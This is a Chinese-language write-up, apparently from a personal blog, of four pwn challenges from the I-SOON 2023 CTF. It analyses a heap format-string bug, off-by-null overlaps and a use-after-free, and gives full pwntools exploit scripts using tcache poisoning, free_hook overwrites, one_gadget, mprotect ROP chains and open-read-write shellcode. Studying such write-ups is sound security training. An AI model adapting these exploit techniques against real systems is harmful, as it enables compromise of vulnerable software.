I-SOON_2023
1. [I-SOON 2023]harde_pwn
首先是检查题目情况
dawn@dawn-virtual-machine:~/Downloads/harde_pwn$ checksec pwn
[*] '/home/dawn/Downloads/harde_pwn/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'../../tools/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/'
其中libc已经给出为2.35,第一反应是找IO利用链,但是这里我发现我自己是想太多了,如果题目给出栈情况,且版本较高,那就应该单利用栈就行了?何况还是pwn1。
虽说是pwn1但是还是没写出来,有个非栈上的格式化漏洞但就是不知道写哪儿。
首先分析反编译代码
_DWORD *fuxk_game()
{
_DWORD *result; // rax
char buf[28]; // [rsp+0h] [rbp-40h] BYREF
__int64 seed; // [rsp+1Ch] [rbp-24h]
int v3; // [rsp+24h] [rbp-1Ch] BYREF
int v4; // [rsp+28h] [rbp-18h]
int i; // [rsp+2Ch] [rbp-14h]
puts("Welcome to a ctype game!");
seed = randomm();
read(0, buf, 0x20uLL);
srand(seed);
for ( i = 0; i <= 20; ++i )
{
v4 = (rand() ^ 0x24) + 1;
puts("input: ");
__isoc99_scanf("%d", &v3);
if ( v4 != v3 )
{
puts("fuxk up!");
exit(1);
}
puts("Success!");
}
result = &is_fmt;
is_fmt = 1;
return result;
}
这里发现首先得过一下上面这个game,可以知道seed是由/dev/urandom而来,所以无法使用ctypes,但是我们发现后面有个buf溢出,可以覆盖到seed,所以我们覆盖为0再写一个简单的c就可以得出连续20个随机数,但这里其实可以用ctypes库了。
过了上面的函数之后就会有一个堆上的格式化字符串
void __noreturn heap_fmt()
{
char *ptr; // [rsp+8h] [rbp-8h]
for ( ptr = 0LL; ; printf(ptr) )
{
ptr = (char *)realloc(ptr, 0x1000uLL);
my_write("input your data ;)\n");
read(0, ptr, 0x1000uLL);
}
}
这里我们发现无法跳出函数,且结束不了主函数,因此无法来通过格式化字符串来写返回值,比赛中我甚至想在栈上写一个堆地址,然后每次修改ptr值为0,导致realloc每次新分配一个0x1000的大块,最终打爆topchunk,再触发一下malloc_assert来使用house of cat,但最终还是没有实现。之后看师傅们的wp发现自己想太多了
得出结论在比赛中重要的还是调试
回到题目中,既然无法达到调用printf的函数ret,那就修改printf的返回值就行,如下:
──────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────
0x7f51addb181a <printf+170> call 0x7f51addc60b0 <0x7f51addc60b0>
0x7f51addb181f <printf+175> mov rdx, qword ptr [rsp + 0x18]
0x7f51addb1824 <printf+180> sub rdx, qword ptr fs:[0x28]
0x7f51addb182d <printf+189> jne printf+199 <printf+199>
0x7f51addb182f <printf+191> add rsp, 0xd8
► 0x7f51addb1836 <printf+198> ret <0x556c83a69500; heap_fmt+92>
↓
0x556c83a69500 <heap_fmt+92> jmp heap_fmt+20 <heap_fmt+20>
↓
0x556c83a694b8 <heap_fmt+20> mov rax, qword ptr [rbp - 8]
0x556c83a694bc <heap_fmt+24> mov esi, 0x1000
0x556c83a694c1 <heap_fmt+29> mov rdi, rax
0x556c83a694c4 <heap_fmt+32> call realloc@plt <realloc@plt>
────────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp 0x7ffe1c865e48 —▸ 0x556c83a69500 (heap_fmt+92) ◂— jmp 0x556c83a694b8
01:0008│ 0x7ffe1c865e50 ◂— 0x0
02:0010│ 0x7ffe1c865e58 —▸ 0x556c845532a0 ◂— '%24160c%15$hn'
03:0018│ rbp 0x7ffe1c865e60 —▸ 0x7ffe1c865e70 ◂— 0x1
04:0020│ 0x7ffe1c865e68 —▸ 0x556c83a69543 (main+65) ◂— mov eax, 0
05:0028│ 0x7ffe1c865e70 ◂— 0x1
06:0030│ 0x7ffe1c865e78 —▸ 0x7f51add7ad90 ◂— mov edi, eax
07:0038│ 0x7ffe1c865e80 ◂— 0x0
可以看到这里printf准备返回了已经,此时rsp上面就写着返回的地址,并且此时这里我们并没有动到rbp,所以我们可以写rsp的值为我们的一个特殊的指令,比如说就是我们的某个指令,然后再跟下面rbp进行配合即可,因此我们选用ret2rcu上的一段指令,
pwndbg> x/20i 0x5582df56d5b0
0x5582df56d5b0 <__libc_csu_init+96>: pop r14
0x5582df56d5b2 <__libc_csu_init+98>: pop r15
0x5582df56d5b4 <__libc_csu_init+100>: ret
我们看到这里的指令真是妙到极点,我们通过ret到该指令这里,然后连续pop两个值,再调用ret就会弹出我们rbp的值,然后就可以执行我们写入rbp的one_gadget了,情况如下:
──────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
0x7f02c954b81a <printf+170> call 0x7f02c95600b0 <0x7f02c95600b0>
0x7f02c954b81f <printf+175> mov rdx, qword ptr [rsp + 0x18]
0x7f02c954b824 <printf+180> sub rdx, qword ptr fs:[0x28]
0x7f02c954b82d <printf+189> jne printf+199 <printf+199>
0x7f02c954b82f <printf+191> add rsp, 0xd8
► 0x7f02c954b836 <printf+198> ret <0x55711d89d5b0; __libc_csu_init+96>
↓
0x55711d89d5b0 <__libc_csu_init+96> pop r14
0x55711d89d5b2 <__libc_csu_init+98> pop r15
0x55711d89d5b4 <__libc_csu_init+100> ret
↓
0x7f02c95d6cf5 <execvpe+1141> mov rsi, r10
0x7f02c95d6cf8 <execvpe+1144> lea rdi, [rip + 0xec999]
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp 0x7ffcfb0d93c8 —▸ 0x55711d89d5b0 (__libc_csu_init+96) ◂— pop r14
01:0008│ 0x7ffcfb0d93d0 ◂— 0x0
02:0010│ 0x7ffcfb0d93d8 —▸ 0x55711ed972a0 ◂— '%176c%45$hhn'
03:0018│ rbp 0x7ffcfb0d93e0 —▸ 0x7f02c95d6cf5 (execvpe+1141) ◂— mov rsi, r10
04:0020│ 0x7ffcfb0d93e8 —▸ 0x55711d89d543 (main+65) ◂— mov eax, 0
05:0028│ 0x7ffcfb0d93f0 ◂— 0x1
06:0030│ 0x7ffcfb0d93f8 —▸ 0x7f02c9514d90 ◂— mov edi, eax
07:0038│ 0x7ffcfb0d9400 ◂— 0x0
至于任意地址写,是我们通过栈上存在的一个栈地址->栈地址->栈地址链条来达成,具体手法可以自行搜索
exp如下:
from pwn import *
from LibcSearcher import *
from ctypes import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
io = process('./pwn')
#io = remote('node4.anna.nssctf.cn',28151)
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")
def debug():
gdb.attach(io)
def get_address(): return u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
sa("game!\n", b'\x00'*32)
sla("input: \n", str(0x6b8b4544))
sla("input: \n", str(0x327b23e3))
sla("input: \n", str(0x643c984e))
sla("input: \n", str(0x66334858))
sla("input: \n", str(0x74b0dc76))
sla("input: \n", str(0x19495cdc))
sla("input: \n", str(0x2ae8946f))
sla("input: \n", str(0x625558c9))
sla("input: \n", str(0x238e1f0e))
sla("input: \n", str(0x46e87cea))
sla("input: \n", str(0x3d1b589f))
sla("input: \n", str(0x507ed790))
sla("input: \n", str(0x2eb141d7))
sla("input: \n", str(0x41b71ee0))
sla("input: \n", str(0x79e2a9c8))
sla("input: \n", str(0x7545e163))
sla("input: \n", str(0x515f0059))
sla("input: \n", str(0x5bd062e7))
sla("input: \n", str(0x12200871))
sla("input: \n", str(0x4db127dd))
sla("input: \n", str(0x2162340))
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
sla("data ;)\n", b'%11$p%9$p%8$p')
ru('0x')
libc_base = int(rc(12), 16) - 0x29d90
ru('0x')
pro_base = int(rc(12), 16) - 0x1543
ru('0x')
stack_addr = int(rc(12), 16) - 0x28
slog("stack_addr", stack_addr)
slog("libc_base", libc_base)
slog("pro_base", pro_base)
stack_low2 = int(stack_addr%0x10000)
print(stack_low2)
rbp = stack_addr + 0x18
rbp_low2 = int(rbp%0x10000)
#change the rbp
one_gadget = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
shell = libc_base + one_gadget[2]
shell_low2 = shell%0x10000
shell_mid2 = int(shell/0x10000)%0x10000
shell_high2 = int(shell/0x100000000)
slog("shell", shell)
sla("data ;)\n", '%'+str(rbp_low2) + 'c%15$hn\x00')
sla("data ;)\n", '%'+str(shell_low2) + 'c%45$hn\x00')
sla("data ;)\n", '%'+str(rbp_low2 + 2) + 'c%15$hn\x00')
sla("data ;)\n", '%'+str(shell_mid2) + 'c%45$hn\x00')
sla("data ;)\n", '%'+str(rbp_low2 + 4) + 'c%15$hn\x00')
sla("data ;)\n", '%'+str(shell_high2) + 'c%45$hn\x00')
#change the ret
sla("data ;)\n", '%'+str(stack_low2) + 'c%15$hn\x00')
debug()
sla("data ;)\n", '%176c%45$hhn\x00')
io.interactive()
2. [I-SOON 2023]pwnpwn
dawn@dawn-virtual-machine:~/Downloads/pwnpwn$ checksec pwn
[*] '/home/dawn/Downloads/pwnpwn/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
题目环境2.31,保护全开
本题十分的可惜,应该是可以出的,感觉是pwn1一直没想到所以心态有点问题,导致本题看的时候居然off by null没看到,这也说明了比赛中心境也是一个重要点,本题十分常规,最开始ida会有一些混淆,例如:
sub_B20();
puts("Welcome to An Xun Cup, this is an menu");
check();
while ( 1 )
{
menu();
__isoc99_scanf("%d", &choice);
switch ( choice )
{
case 1:
add();
break;
case 2:
if ( dword_203024 < 10 || (((dword_203098 - 1) * dword_203098) & 1) == 0 )
goto LABEL_5;
do
{
show();
LABEL_5:
show();
}
while ( dword_203024 >= 10 && (((dword_203098 - 1) * dword_203098) & 1) != 0 );
break;
慢慢逆会发现这些语句就是一些重复的,不用管他们,整个题首先需要ctypes进行模拟,出几个随机数的个位来猜组合的千位数,然后这里面show和edit/delete功能不能同时使用,需要运行权限切换的一个函数来切换状态,其他就十分常规,add函数里面由off by null(我朝,太sb了我)。
然后之后就是制造重叠堆块,向上合并,这里记住恢复一下堆块们的布局,之后就是重叠堆块中写以释放堆块tcachebins的fd指针了,很常规,写free hook,
exp如下:
from pwn import *
from LibcSearcher import *
from ctypes import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
io = process('./pwn')
#io = remote('node4.anna.nssctf.cn',28151)
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")
def debug():
gdb.attach(io)
def get_address(): return u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
def add(index, size, content):
sla("root@$\n", str(1))
sla("index:\n", str(index))
sla("size:\n", str(size))
sa("content:\n", content)
def show(index):
sla("root@$\n", str(2))
sla("index:\n", str(index))
def edit(index, content):
sla("root@$\n", str(3))
sla("index\n", str(index))
sla("index\n", str(index))
sa("content:\n", content)
def edit_0(index, content):
sla("root@$\n", str(3))
sla("index\n", str(index))
sa("content:\n", content)
def delete(index):
sla("root@$\n", str(4))
sla("index:\n", str(index))
def login(passwd):
sla("root@$\n", str(5))
sla("username\n", 'fang')
sla("passwd\n", passwd)
LIBC = cdll.LoadLibrary('./libc-2.31.so')
LIBC.srand(LIBC.time(0))
libc = ELF('./libc-2.31.so')
qian = LIBC.rand()%10
bai = LIBC.rand()%10
shi = LIBC.rand()%10
ge = LIBC.rand()%10
num = qian*1000 + bai*100 + shi*10 + ge
sla("number:", str(num))
add(0, 0x410, b'aaaaa')
add(1, 0x20, b'ccc')
login('abcd') # show->edit
s('\n')
edit(0, b'cbdfasaf')
delete(0)
add(0, 0x410, b'a'*7)
edit(0, b'a'*8)
debug()
login('a'*8) # edit->show
show(0)
libc_base = get_address() - 0x1ecbe0
slog("libc_base", libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
slog("__malloc_hook", malloc_hook)
free_hook = libc_base + libc.sym['__free_hook']
slog("__free_hook", free_hook)
system = libc_base + libc.sym['system']
# leak the heap
login(b'a'*3 + b'\x00') #show->edit
add(2, 0x20, b'fdasf')
add(3, 0x4f0, b'aaaa')
add(4, 0x10, b'aaaa')
add(5, 0x20, b'aaaa')
delete(0)
add(6, 0x500, b'cccc')
add(0, 0x410, b'aaaa')
edit(0, b'a'*0xf + b'c')
login(b'a'*8) #edit->show
show(0)
ru('ac')
heap_base = u64(rc(6).ljust(8, b'\x00')) - 0x290
slog("heap_base", heap_base)
login(b'aaa\x00')
delete(2)
add(2, 0x28, p64(heap_base + 0x6c0) + b'a'*0x18 + p64(0x50))
delete(1)
add(1, 0x20, p64(0)+p64(0x51) + p64(heap_base + 0x6f0 - 0x18) + p64(heap_base + 0x6f0 - 0x10)) #pass the unlink check
delete(3) #overlap backward
add(3, 0x100, p64(0)*3 + p64(0x31)) #resolve the heap
delete(5)
delete(2)
delete(3)
add(3, 0x100, p64(0)*3 + p64(0x31) + p64(free_hook))
add(2, 0x20, b'ccc')
add(5, 0x20, p64(system))
add(7, 0x20, b'/bin/sh\x00')
delete(7)
io.interactive()
3.[I-SOON 2023] DE-CAT
照常检查,
dawn@dawn-virtual-machine:~/Downloads/pwn/toCTFer$ checksec pwn
[*] '/home/dawn/Downloads/pwn/toCTFer/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./'
保护全开以及版本为2.35
dawn@dawn-virtual-machine:~/Downloads/pwn/toCTFer$ seccomp-tools dump ./pwn
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
存在沙盒,禁止了execve,所以基本上可以确定使用orw
题目的漏洞为edit函数当中的off by null
result = (*(&chunk_list + v1) + read(0, *(&chunk_list + v1), size_list[v1]));
*result = 0;
因此本题依然是采用overlapp来解题,首先是制造重叠堆块,然后修改tcache,这里因为我们需要多次分配奇奇怪怪的堆块,所以我们先控制tcache struct的0x290堆块来任意分配堆块。
控制了tcache struct后我们就可以通过environ来获取栈地址,然后我们修改add的ret地址来制造ROP,这里我们调用mprotect函数来将我们的栈地址增加一个执行权限,然后再到上面布置shellcode即可orw
exp如下:
from pwn import *
from LibcSearcher import*
context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
io = process('./pwn')
#io = remote('59.110.164.72', 10066)
#io = remote("node4.buuoj.cn", 26610)
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
def slog(name, address): print("\033[40;31m[+]\033[40;35m"+ name + "==>" + hex(address) + "\033[0m")
def debug(): gdb.attach(io)
def get_address(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
def add(size, content): #0x2d
sla(b">> \n", '1')
sla(b"size:\n",str(size))
sa(b'content:\n', content)
def delete(index):
sla(b'>> \n', '2')
sla("idx:\n", str(index))
def show(index):
sla(b">> \n", '3')
sla(b'idx:\n', str(index))
def edit(index, content):
sla(b">> \n", '4')
sla(b'idx:\n', str(index))
sa(b'content:\n', content)
def kill(index):
sla(b">> \n", '5')
sla(b'--->\n', str(index))
add(0x4f8, b'aaaa') #0
add(0x4f8, b'aaaa') #1
delete(0)
add(0x5f8, b'aaaa') #0
add(0x4f8, b' ') #2
show(2)
ru('\x00\x00')
libc_base = get_address()- 0x21a110
ru('\x00\x00')
heap_base = u64(rc(6).ljust(8, b'\x00')) - 0x290
slog("libc_base", libc_base)
slog("heap_base", heap_base)
edit(2, flat({0x0:heap_base + 0x290, 0x8:heap_base + 0x290, 0x4f0:0x500}, filler = b'\x00', length = 0x4f8))
libc = ELF('./libc.so.6')
mprotect = libc_base + libc.sym['mprotect']
slog("mprotect", mprotect)
delete(1) #overlap backward
add(0x288, b'aa') #1
add(0x288, b'a') #3
delete(3)
delete(2)
edit(1, p64(((heap_base + 0x2a0)>>12)^(heap_base + 0x10))) #alloc the tcache struct
add(0x288, b'aa') #2
add(0x288, flat({0x30:0x1, 0x140:libc_base + 0x221200 - 0x10}, filler = b'\x00', length = 0x288)) #3 , environ
add(0x198, b'a'*0x10) #4
show(4)
stack_addr = get_address()
slog("stack", stack_addr)
debug()
add_ret = stack_addr - 0x140
pop_rdi = libc_base + 0x000000000002a3e5
pop_rsi = libc_base + 0x000000000002be51
pop_rdx_r12 = libc_base + 0x000000000011f497
jmp_rsp = libc_base + 0x8821d
edit(3, flat({0x30:0x1, 0x140:add_ret - 0x8}, filler = b'\x00'))
slog("add_ret", add_ret)
payload = p64(0) + p64(pop_rdi) + p64(stack_addr&(~0xfff)) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx_r12) + p64(7)*2 + p64(mprotect)
payload += p64(jmp_rsp)
shellcode = shellcraft.open('./flag', 0)
shellcode += shellcraft.read('rax', heap_base + 0xca0, 0x30)
shellcode += shellcraft.write(1, heap_base + 0xca0, 0x30)
shellcode = asm(shellcode)
payload += shellcode + b'aaaa'
add(0x198, payload)
io.interactive()
4.[I-SOON 2023]computer
本题突一个字“逆”,题目中冗杂的数据结构以及分配手法令人眼花缭乱。此时仅需要一颗平静的心态和良好的环境(以及星盟的wp呜呜呜)。
据说computer团长一个半小时就出了,tql。
先检查一下,不过多半也是全开
dawn@dawn-virtual-machine:~/Downloads/pwn/computer$ checksec computer
[*] '/home/dawn/Downloads/pwn/computer/computer'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'../../../tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/'
其中也存在沙盒,因此是采用orw
dawn@dawn-virtual-machine:~/Downloads/pwn/computer$ seccomp-tools dump ./computer
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00030000 return TRAP
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
然后就是本题最为关键的逆向环节
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
char s[2568]; // [rsp+10h] [rbp-A10h] BYREF
unsigned __int64 v4; // [rsp+A18h] [rbp-8h]
v4 = __readfsqword(0x28u);
sub_3E2C();
root_dir = create("/", 1, 0LL, 7); // 创建文件夹
root_ptr = root_dir;
HRP = create("HRP", 0, 0LL, 7); // 创建文件
linkfile(root_dir, HRP); // /HRP
mkflag(root_dir);
while ( 1 )
{
printf("> ");
fgets(s, 2560, stdin);
s[strcspn(s, "\n")] = 0;
menu(&root_ptr, s, root_dir, HRP);
fflush(stdin);
}
}
其中create函数可以得知他可以根据所给参数判断是创建文件或文件夹,文件的部分大致如下:
|文件名指针| |
|文件内容指针|上级文档|
|文件类型 |下一个文件 |
|文件大小 | |
这里最难绷的是ida本身可能会出现点反编译的错误,所以我们需要在给数据结构赋值过程中查看汇编语言来帮助我们逆向,在其中会出现malloc的情况,除此之外我们还需要注意到strdup这个函数。
strdup这个函数是一个复制函数,他会在内部malloc一定空间,然后复制参数到其中,最后将该空间作为返回值传递,因此他也经常与free函数一起出现,但是这里我们发现并没有。
然后函数就是让我们不断传递控制命令,其中有漏洞的地方就是kill命令有一个uaf,如下:
else if ( !strcmp(command_0, "kill") )
{
v12 = atoi(command_1);
if ( v12 >= 0 && v12 <= exec_num )
{
free(*(*(&process + v12) + 8LL));
free(*(&process + v12));
--exec_num;
printf("%d had been killed\n", v12);
}
}
这里我们采用的方式是先填充tcache,通过unsortbin来泄露libc和heap基地址,然后在fastbin中构造A-B-A来进攻击,最后修改我们menu函数的返回值来写ROP
exp如下:
from pwn import *
from LibcSearcher import *
from ctypes import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
io = process('./computer')
#io = remote('node4.anna.nssctf.cn',28151)
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")
def debug():
gdb.attach(io)
def get_address(): return u64(ru('\x7f')[-6:].ljust(8, b'\x00'))
sla("> ", b'touch ' + b'a'*0xe7)
for i in range(16):
sla("> ", b'exec ' + b'a'*0xe7)
for i in range(10):
sla("> ", b'touch ' + str(i).encode())
for i in range(8)[::-1]:
sla("> ", b"kill " + str(i).encode())
# now we have tcache(0x20):7, tcache(0xf0):7, fastbin(0x20):1, unsortbin(0xf0):1
sla("> ", b"ps")
libc_base = get_address() - 0x3ebca0
slog("libc_base", libc_base)
libc = ELF('./libc-2.27.so')
sla("> ", b'touch ' + b'b'*8 + p64(libc_base + libc.sym['_environ']))
sla("> ", b'ps')
ru('\x09')
ru('\x09')
heap_base = u64(rc(6).ljust(8, b'\x00')) - 0x660
slog("heap_base", heap_base)
ru('\x09')
stack_addr = u64(rc(6).ljust(8, b'\x00'))
slog("stack_addr", stack_addr)
sla("> ", b'rm 0') #fix the tcache
sla("> ", b'rm 1')
sla("> ", b'kill 0')
sla("> ", b'mkdir new')
sla("> ", b'cd new')
sla("> ", b'touch 00')
sla("> ", b'touch 01')
sla("> ", b'touch 02')
sla("> ", b'touch ' + p64(stack_addr - 0xb28))
sla("> ", b'touch ' + b'03'*0x19)
slog("stack_ret", stack_addr - 0xb28)
pop_rdi = libc_base + 0x2164f
pop_rsi = libc_base + 0x23a6a
pop_rdx = libc_base + 0x1b96
pop_rax = libc_base + 0x1b500
jmp_rsp = libc_base + 0x2b25
mprotect = libc_base + libc.sym['mprotect']
flag_addr = heap_base + 0x1b90
add_rsp_sub = libc_base + 0xbaf9c
pl = b'a'*8 + p64(add_rsp_sub) + b'a'*(0x100-0x26) + p64(pop_rdi) + p64((stack_addr - 0xb28)&(~0xfff)) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx) +p64(7) + p64(mprotect)
pl += p64(jmp_rsp)
shellcode = asm(shellcraft.open("./flag", 0) + shellcraft.read('3', heap_base + 0x1440, 0x30) + shellcraft.write(1, heap_base + 0x1440, 0x30))
pl += shellcode
sla("> ", b'touch ' + pl)
io.interactive()
I-SOON_2023
https://peiandhao.github.io/2023/06/17/I-SOON-2023(pwn)/